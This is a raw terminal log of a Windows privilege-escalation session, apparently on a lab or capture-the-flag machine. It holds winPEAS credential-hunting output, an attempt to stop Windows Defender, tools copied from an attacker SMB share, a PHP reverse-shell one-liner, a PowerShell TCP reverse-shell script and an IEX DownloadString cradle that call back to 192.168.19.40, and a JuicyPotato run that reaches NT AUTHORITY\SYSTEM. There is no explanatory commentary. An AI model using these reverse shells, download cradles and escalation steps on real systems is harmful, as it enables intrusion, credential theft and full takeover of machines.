    Current Profiles: PUBLIC
    FirewallEnabled (Domain):    False
    FirewallEnabled (Private):    False
    FirewallEnabled (Public):    False
    DENY rules:

  [+] DNS cached --limit 70--(T1016)
    Entry                                 Name                                  Data


  =========================================(Windows Credentials)=========================================

  [+] Checking Windows Vault()
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault
    Not Found

  [+] Checking Credential manager()
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault
    This function is not yet implemented.
    [i] If you want to list credentials inside Credential Manager use 'cmdkey /list'

  [+] Saved RDP connections()
    Not Found

  [+] Recently run commands()
    Not Found

  [+] PS default transcripts history()
    [i] Read the PS histpry inside these files (if any)

  [+] Checking for DPAPI Master Keys()
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
    MasterKey: C:\Users\Rob\AppData\Roaming\Microsoft\Protect\S-1-5-21-4197226209-1053957285-1453810330-1002\284bf979-4f3d-49e3-9002-5794fc724c26
    Accessed: 2/15/2019 12:40:37 PM
    Modified: 3/29/2019 10:56:25 PM
   =================================================================================================


  [+] Checking for Credential Files()
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
    CredFile: C:\Users\Rob\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
    Description: Local Credential Data

    MasterKey: 284bf979-4f3d-49e3-9002-5794fc724c26
    Accessed: 3/29/2019 10:56:29 PM
    Modified: 3/29/2019 10:56:29 PM
    Size: 11296
   =================================================================================================

    [i] Follow the provided link for further instructions in how to decrypt the creds file

  [+] Checking for RDCMan Settings Files()
   [?] Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager                                                                                                                                           
    Not Found

  [+] Looking for kerberos tickets()
   [?]  https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
    Not Found

  [+] Looking saved Wifis()
    This function is not yet implemented.
    [i] If you want to list saved Wifis connections you can list the using 'netsh wlan show profile'
    [i] If you want to get the clear-text password use 'netsh wlan show profile <SSID> key=clear'

  [+] Looking AppCmd.exe()
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
    Not Found

  [+] Looking SSClient.exe()
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#scclient-sccm
    Not Found

  [+] Checking AlwaysInstallElevated(T1012)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated isn't available

  [+] Checking WSUS(T1012)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
    Not Found


  ========================================(Browsers Information)========================================

  [+] Looking for Firefox DBs(T1503)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
    Not Found

  [+] Looking for GET credentials in Firefox history(T1503)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
    Not Found

  [+] Looking for Chrome DBs(T1503)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
    Not Found

  [+] Looking for GET credentials in Chrome history(T1503)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
    Not Found

  [+] Chrome bookmarks(T1217)
    Not Found

  [+] Current IE tabs(T1503)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history
  [X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: The server process could not be started because the configured identity is incorrect. Check the username and password. (Exception from HRESULT: 0x8000401A)                                                                                                                                      
   --- End of inner exception stack trace ---                                                                                                            
   at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)                                                                                                                                  
   at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)                                                                                                      
   at winPEAS.KnownFileCredsInfo.GetCurrentIETabs()                                                                                                      
    Not Found

  [+] Looking for GET credentials in IE history(T1503)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history

  [+] IE favorites(T1217)
    http://go.microsoft.com/fwlink/p/?LinkId=255142


  ==============================(Interesting files and registry)==============================

  [+] Putty Sessions()
    Not Found

  [+] Putty SSH Host keys()
    Not Found

  [+] SSH keys in registry()
   [?] If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#ssh-keys-in-registry                                                                                                                                
    Not Found

  [+] Cloud Credentials(T1538&T1083&T1081)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    Not Found

  [+] Unnattend Files()

  [+] Looking for common SAM & SYSTEM backups()

  [+] Looking for McAfee Sitelist.xml Files()
  [X] Exception: Could not find a part of the path 'C:\Documents and Settings'.

  [+] Cached GPP Passwords()
  [X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'.

  [+] Looking for possible regs with creds(T1012&T1214)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry
    Not Found
    Not Found
    Not Found
    Not Found

  [+] Looking for possible password files in users homes(T1083&T1081)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml

  [+] Looking inside the Recycle Bin for creds files(T1083&T1081&T1145)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    Not Found

  [+] Searching known files that can contain creds in home(T1083&T1081)
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files

  [+] Looking for documents --limit 100--(T1083)
    Not Found

  [+] Recent files --limit 70--(T1083&T1081)
    Not Found
PS C:\users\Rob\Desktop> type 'C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml'
<?xml version="1.0" encoding="utf-8"?>
<!--
Modifying the settings location templates for an application or a 
Windows setting group provided with Microsoft User Experience Virtualization 
may cause synchronization for the modified settings to fail. 
For more information about settings location templates please see 
the UE-V product documentation.  http://go.microsoft.com/fwlink/?LinkId=260889
-->

<SettingsLocationTemplate xmlns='http://schemas.microsoft.com/UserExperienceVirtualization/2013/SettingsLocationTemplate'>
  <!-- Roaming Credential settings -->
  <Name>Roaming Credential Settings</Name>
  <ID>RoamingCredentialSettings</ID>
  <LocalizedNames>
    <Name Locale='en-us'>Roaming Credential Settings</Name>
    <Name Locale='cs-cz'>Nastaven? cestovn?ch p?ihla?ovac?ch ?daj?</Name>
    <Name Locale='da-dk'>Indstillinger for roaminglegitimationsoplysninger</Name>
    <Name Locale='de-de'>Einstellungen f?r servergespeicherte Anmeldeinformationen</Name>
    <Name Locale='el-gr'>????????? ??????????????? ??????????</Name>
    <Name Locale='es-es'>Configuraci?n de credenciales m?viles</Name>
    <Name Locale='fi-fi'>Verkkovierailutunnistetietojen asetukset</Name>
    <Name Locale='fr-fr'>Param?tres d?informations d?identification itinerants</Name>
    <Name Locale='hu-hu'>Hordozhat? hiteles?t?adat-be?ll?t?sok</Name>
    <Name Locale='it-it'>Impostazioni per le credenziali di roaming</Name>
    <Name Locale='ja-jp'>?????????</Name>
    <Name Locale='ko-kr'>?? ?? ?? ??</Name>
    <Name Locale='nb-no'>Innstillinger for sentrallegitimasjon</Name>
    <Name Locale='nl-nl'>Referentie-instellingen voor roaming</Name>
    <Name Locale='pl-pl'>Ustawienia po?wiadcze? mobilnych</Name>
    <Name Locale='pt-br'>Configura??es de Credenciais de Roaming</Name>
    <Name Locale='pt-pt'>Defini??es de Credencial de Roaming</Name>
    <Name Locale='ru-ru'>????????? ???????????? ??????? ??????</Name>
    <Name Locale='sk-sk'>Nastavenia zdie?ania poveren?</Name>
    <Name Locale='sl-si'>Nastavitve poverilnic za gostovanje</Name>
    <Name Locale='sv-se'>Autentiseringsinst?llningar f?r n?tverksv?xling</Name>
    <Name Locale='tr-tr'>Dola??m Kimlik Bilgileri Ayarlar?</Name>
    <Name Locale='zh-cn'>??????</Name>
    <Name Locale='zh-tw'>??????</Name>
  </LocalizedNames>
  <Version>0</Version>
  <DeferToMSAccount/>
  <Processes>
    <ShellProcess/>
  </Processes>

  <Settings>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Credentials</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Crypto</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\Protect</Path>
    </File>
    <File>
      <Root>
        <EnvironmentVariable>USERPROFILE</EnvironmentVariable>
      </Root>
      <Path Recursive="true">AppData\Roaming\Microsoft\SystemCertificates</Path>
    </File>
  </Settings>
</SettingsLocationTemplate>
PS C:\users\Rob\Desktop> netstat -anpb tcp
The requested operation requires elevation.
PS C:\users\Rob\Desktop> sc.exe stop WinDefend
[SC] OpenService FAILED 5:

Access is denied.

PS C:\users\Rob\Desktop> sc.exe start WinDefend
[SC] StartService FAILED 577:

Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

PS C:\users\Rob\Desktop> cd 'c:\program files\'
PS C:\program files> dir


    Directory: C:\program files


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019  11:45 AM                Common Files                                                          
d-----        2/15/2019   5:37 PM                internet explorer                                                     
d-----        2/15/2019  12:09 PM                rempl                                                                 
d-----        2/15/2019  11:49 AM                VMware                                                                
d-r---        2/15/2019   5:37 PM                Windows Defender                                                      
d-----        2/15/2019   5:37 PM                Windows Defender Advanced Threat Protection                           
d-----        9/29/2017   2:46 PM                Windows Mail                                                          
d-----        2/15/2019   5:37 PM                Windows Media Player                                                  
d-----        9/29/2017   2:46 PM                Windows Multimedia Platform                                           
d-----        9/29/2017   2:46 PM                windows nt                                                            
d-----        2/15/2019   5:37 PM                Windows Photo Viewer                                                  
d-----        9/29/2017   2:46 PM                Windows Portable Devices                                              
d-----        9/29/2017   2:46 PM                Windows Security                                                      
d-----        9/29/2017   2:46 PM                WindowsPowerShell                                                     


PS C:\program files> copy \\192.168.19.40\share\winPEAS.exe
PS C:\program files> dir


    Directory: C:\program files


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019  11:45 AM                Common Files                                                          
d-----        2/15/2019   5:37 PM                internet explorer                                                     
d-----        2/15/2019  12:09 PM                rempl                                                                 
d-----        2/15/2019  11:49 AM                VMware                                                                
d-r---        2/15/2019   5:37 PM                Windows Defender                                                      
d-----        2/15/2019   5:37 PM                Windows Defender Advanced Threat Protection                           
d-----        9/29/2017   2:46 PM                Windows Mail                                                          
d-----        2/15/2019   5:37 PM                Windows Media Player                                                  
d-----        9/29/2017   2:46 PM                Windows Multimedia Platform                                           
d-----        9/29/2017   2:46 PM                windows nt                                                            
d-----        2/15/2019   5:37 PM                Windows Photo Viewer                                                  
d-----        9/29/2017   2:46 PM                Windows Portable Devices                                              
d-----        9/29/2017   2:46 PM                Windows Security                                                      
d-----        9/29/2017   2:46 PM                WindowsPowerShell                                                     


PS C:\program files> copy \\192.168.19.40\share\text.txt
PS C:\program files> dir


    Directory: C:\program files


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019  11:45 AM                Common Files                                                          
d-----        2/15/2019   5:37 PM                internet explorer                                                     
d-----        2/15/2019  12:09 PM                rempl                                                                 
d-----        2/15/2019  11:49 AM                VMware                                                                
d-r---        2/15/2019   5:37 PM                Windows Defender                                                      
d-----        2/15/2019   5:37 PM                Windows Defender Advanced Threat Protection                           
d-----        9/29/2017   2:46 PM                Windows Mail                                                          
d-----        2/15/2019   5:37 PM                Windows Media Player                                                  
d-----        9/29/2017   2:46 PM                Windows Multimedia Platform                                           
d-----        9/29/2017   2:46 PM                windows nt                                                            
d-----        2/15/2019   5:37 PM                Windows Photo Viewer                                                  
d-----        9/29/2017   2:46 PM                Windows Portable Devices                                              
d-----        9/29/2017   2:46 PM                Windows Security                                                      
d-----        9/29/2017   2:46 PM                WindowsPowerShell                                                     


PS C:\program files> cd ,,


    Directory: C:\program files


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019  11:45 AM                Common Files                                                          
d-----        2/15/2019   5:37 PM                internet explorer                                                     
d-----        2/15/2019  12:09 PM                rempl                                                                 
d-----        2/15/2019  11:49 AM                VMware                                                                
d-r---        2/15/2019   5:37 PM                Windows Defender                                                      
d-----        2/15/2019   5:37 PM                Windows Defender Advanced Threat Protection                           
d-----        9/29/2017   2:46 PM                Windows Mail                                                          
d-----        2/15/2019   5:37 PM                Windows Media Player                                                  
d-----        9/29/2017   2:46 PM                Windows Multimedia Platform                                           
d-----        9/29/2017   2:46 PM                windows nt                                                            
d-----        2/15/2019   5:37 PM                Windows Photo Viewer                                                  
d-----        9/29/2017   2:46 PM                Windows Portable Devices                                              
d-----        9/29/2017   2:46 PM                Windows Security                                                      
d-----        9/29/2017   2:46 PM                WindowsPowerShell                                                     


PS C:\program files> cd ..
PS C:\> copy \\192.168.19.40\share\test.txt
PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019   5:37 PM                PerfLogs                                                              
d-r---        2/15/2019  12:09 PM                Program Files                                                         
d-r---        2/15/2019  12:45 PM                Program Files (x86)                                                   
d-----        2/15/2019  12:48 PM                Python27                                                              
d-r---        2/15/2019  12:53 PM                Users                                                                 
d-----        2/18/2019  11:01 PM                Windows                                                               


PS C:\> 
PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019   5:37 PM                PerfLogs                                                              
d-r---        2/15/2019  12:09 PM                Program Files                                                         
d-r---        2/15/2019  12:45 PM                Program Files (x86)                                                   
d-----        2/15/2019  12:48 PM                Python27                                                              
d-r---        2/15/2019  12:53 PM                Users                                                                 
d-----        2/18/2019  11:01 PM                Windows                                                               


PS C:\> cd /Users/Rob/Desktop
PS C:\Users\Rob\Desktop> dir


    Directory: C:\Users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020  12:03 PM            287 test_clsid.bat                                                        
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\Users\Rob\Desktop> .\JuicyPotato.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
PS C:\Users\Rob\Desktop> copy \\192.168.14.90\share\LFISuite\nc.exe
PS C:\Users\Rob\Desktop> dir


    Directory: C:\Users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020  12:03 PM            287 test_clsid.bat                                                        
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\Users\Rob\Desktop> copy \\192.168.14.90\share\nc.exe
PS C:\Users\Rob\Desktop> dir


    Directory: C:\Users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020  12:03 PM            287 test_clsid.bat                                                        
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\Users\Rob\Desktop> .\php
PS C:\Users\Rob\Desktop> php -r '$sock=fsockopen("192.168.19.40",4241);exec("/bin/sh -i <&3 >&3 2>&3");'
PS C:\Users\Rob\Desktop> .\php -r '$sock=fsockopen("192.168.19.40",4241);exec("/bin/sh -i <&3 >&3 2>&3");'
PS C:\Users\Rob\Desktop> .\JuicyPotato.exe
JuicyPotato v0.1 

Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
PS C:\Users\Rob\Desktop> copy \\192.168.19.40\share\rev.bat
PS C:\Users\Rob\Desktop> dir


    Directory: C:\Users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020   1:31 PM            531 rev.bat                                                               
-a----        4/27/2020  12:03 PM            287 test_clsid.bat                                                        
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\Users\Rob\Desktop> type rev.bat
powershell -nop -c 
"$client = New-Object System.Net.Sockets.TCPClient('192.168.19.40',4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()
PS C:\Users\Rob\Desktop> .\JuicyPotato.exe -t * -p C:\Users\Rob\Desktop\rev.bat -l 9002
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 9002
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
PS C:\Users\Rob\Desktop> whoami
homestudy\rob
PS C:\Users\Rob\Desktop> whoami /all

USER INFORMATION
----------------

User Name     SID                                           
============= ==============================================
homestudy\rob S-1-5-21-4197226209-1053957285-1453810330-1002


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

PS C:\Users\Rob\Desktop> .\rev.bat

C:\Users\Rob\Desktop>powershell -nop -c  

PowerShell[.exe] [-PSConsoleFile <file> | -Version <version>]
    [-NoLogo] [-NoExit] [-Sta] [-Mta] [-NoProfile] [-NonInteractive]
    [-InputFormat {Text | XML}] [-OutputFormat {Text | XML}]
    [-WindowStyle <style>] [-EncodedCommand <Base64EncodedCommand>]
    [-ConfigurationName <string>]
    [-File <filePath> <args>] [-ExecutionPolicy <ExecutionPolicy>]
    [-Command { - | <script-block> [-args <arg-array>]
                  | <string> [<CommandParameters>] } ]

PowerShell[.exe] -Help | -? | /?

-PSConsoleFile
    Loads the specified Windows PowerShell console file. To create a console
    file, use Export-Console in Windows PowerShell.

-Version
    Starts the specified version of Windows PowerShell. 
    Enter a version number with the parameter, such as "-version 2.0".

-NoLogo
    Hides the copyright banner at startup.

-NoExit
    Does not exit after running startup commands.

-Sta
    Starts the shell using a single-threaded apartment.
    Single-threaded apartment (STA) is the default.

-Mta
    Start the shell using a multithreaded apartment.

-NoProfile
    Does not load the Windows PowerShell profile.

-NonInteractive
    Does not present an interactive prompt to the user.

-InputFormat
    Describes the format of data sent to Windows PowerShell. Valid values are
    "Text" (text strings) or "XML" (serialized CLIXML format).

-OutputFormat
    Determines how output from Windows PowerShell is formatted. Valid values
    are "Text" (text strings) or "XML" (serialized CLIXML format).

-WindowStyle
    Sets the window style to Normal, Minimized, Maximized or Hidden.

-EncodedCommand
    Accepts a base-64-encoded string version of a command. Use this parameter 
    to submit commands to Windows PowerShell that require complex quotation 
    marks or curly braces.

-ConfigurationName
    Specifies a configuration endpoint in which Windows PowerShell is run.
    This can be any endpoint registered on the local machine including the
    default Windows PowerShell remoting endpoints or a custom endpoint having
    specific user role capabilities.
    
-File
    Runs the specified script in the local scope ("dot-sourced"), so that the 
    functions and variables that the script creates are available in the 
    current session. Enter the script file path and any parameters. 
    File must be the last parameter in the command, because all characters 
    typed after the File parameter name are interpreted 
    as the script file path followed by the script parameters.

-ExecutionPolicy
    Sets the default execution policy for the current session and saves it 
    in the $env:PSExecutionPolicyPreference environment variable. 
    This parameter does not change the Windows PowerShell execution policy 
    that is set in the registry.

-Command
    Executes the specified commands (and any parameters) as though they were
    typed at the Windows PowerShell command prompt, and then exits, unless 
    NoExit is specified. The value of Command can be "-", a string. or a
    script block.

    If the value of Command is "-", the command text is read from standard
    input.

    If the value of Command is a script block, the script block must be enclosed
    in braces ({}). You can specify a script block only when running PowerShell.exe
    in Windows PowerShell. The results of the script block are returned to the
    parent shell as deserialized XML objects, not live objects.

    If the value of Command is a string, Command must be the last parameter
    in the command , because any characters typed after the command are 
    interpreted as the command arguments.

    To write a string that runs a Windows PowerShell command, use the format:
        "& {<command>}"
    where the quotation marks indicate a string and the invoke operator (&)
    causes the command to be executed.

-Help, -?, /?
    Shows this message. If you are typing a PowerShell.exe command in Windows
    PowerShell, prepend the command parameters with a hyphen (-), not a forward
    slash (/). You can use either a hyphen or forward slash in Cmd.exe.

EXAMPLES
    PowerShell -PSConsoleFile SqlSnapIn.Psc1
    PowerShell -version 2.0 -NoLogo -InputFormat text -OutputFormat XML
    PowerShell -ConfigurationName AdminRoles
    PowerShell -Command {Get-EventLog -LogName security}
    PowerShell -Command "& {Get-EventLog -LogName security}"

    # To use the -EncodedCommand parameter:
    $command = 'dir "c:\program files" '
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes)
    powershell.exe -encodedCommand $encodedCommand

C:\Users\Rob\Desktop>"$client = New-Object System.Net.Sockets.TCPClient('192.168.19.40',4444);

C:\Users\Rob\Desktop>$stream = $client.GetStream();[byte[]]$bytes = 0..65535  | %{0}; 
PS C:\Users\Rob\Desktop> rem rev.bat
PS C:\Users\Rob\Desktop> dir


    Directory: C:\Users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020   1:31 PM            531 rev.bat                                                               
-a----        4/27/2020  12:03 PM            287 test_clsid.bat                                                        
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\Users\Rob\Desktop> del rev.bat
PS C:\Users\Rob\Desktop> dir


    Directory: C:\Users\Rob\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        4/27/2020  11:26 AM         347648 JuicyPotato.exe                                                       
-a----        4/27/2020  11:49 AM             32 local.txt                                                             
-a----        4/27/2020  12:03 PM            287 test_clsid.bat                                                        
-a----        4/27/2020  11:08 AM         241664 winPEAS.exe                                                           


PS C:\Users\Rob\Desktop> copy \\192.168.19.40\share\rev.bat
PS C:\Users\Rob\Desktop> ./rev.bat

C:\Users\Rob\Desktop>powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.19.40,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 
PS C:\Users\Rob\Desktop> del rev.bat
PS C:\Users\Rob\Desktop> copy \\192.168.19.40\share\rev.bat
PS C:\Users\Rob\Desktop> type rev.bat
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.19.40:1234/mini-reverse.ps1')
PS C:\Users\Rob\Desktop> ./rev.bat

C:\Users\Rob\Desktop>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.19.40:1234/mini-reverse.ps1') 
PS C:\Users\Rob\Desktop> .\rev.bat


^C
kali@kali:~$ nc -nvlp 4242
listening on [any] 4242 ...
connect to [192.168.19.40] from (UNKNOWN) [192.168.40.42] 49710
dir


    Directory: C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.5


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        2/15/2019  12:36 PM                bin                                                                   
d-----        2/15/2019  12:36 PM                conf                                                                  
d-----        2/15/2019  12:36 PM                lib                                                                   
d-----        4/27/2020  11:51 AM                logs                                                                  
d-----        2/15/2019  12:36 PM                temp                                                                  
d-----        2/15/2019  12:36 PM                webapps                                                               
d-----        2/15/2019  12:36 PM                work                                                                  
-a----        9/13/2017   9:30 PM          58153 LICENSE                                                               
-a----        9/13/2017   9:30 PM           1774 NOTICE                                                                
-a----        9/13/2017   9:30 PM           7241 RELEASE-NOTES                                                         
-a----        9/13/2017   9:30 PM          21630 tomcat.ico                                                            
-a----        9/13/2017   9:30 PM          79424 Uninstall.exe                                                         


PS C:\Program Files (x86)\Apache Software Foundation\Tomcat 8.5> cd c:\users\rob\desktop
PS C:\users\rob\desktop> .\JuicyPotato.exe -t * -p C:\Users\Rob\Desktop\rev.bat -l 9002
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 9002
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
PS C:\users\rob\desktop> 
PS C:\users\rob\desktop> 
